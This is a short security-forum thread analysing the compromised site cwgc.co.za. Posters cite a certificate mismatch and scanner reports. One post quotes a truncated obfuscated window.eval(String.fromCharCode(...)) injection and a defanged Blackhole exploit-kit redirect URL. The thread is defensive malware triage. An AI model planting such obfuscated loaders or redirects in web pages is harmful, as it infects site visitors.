What about certificate name mismatch?

See: http://app.webinspector.com/public/reports/show_website?site=https%3A%2F%2Fwww.cwgc.co.za
& https://www.ssllabs.com/ssltest/analyze.html?d=cwgc.co.za

polonus

This site is hosted networks botnet
the certificate is false to result points

http://wepawet.iseclab.org/view.php?hash=8efa7f7f2ccd8a87d50594739aa0f59e&t=1395614881&type=js

script Obfuscated script

/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,

http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole2

Redirection malicious

hxxp://eqqawkklmvkbowdi.ru/runforestrun?sid=botnet2 NXDOMAIN N / A

“hidden”; iframe
avast detects

JS:iframe-CWW [trj]

Hi jefferson santiag,

Thanks for that profound evaluation and mentioning the redirection detection.
We are being protected.

pol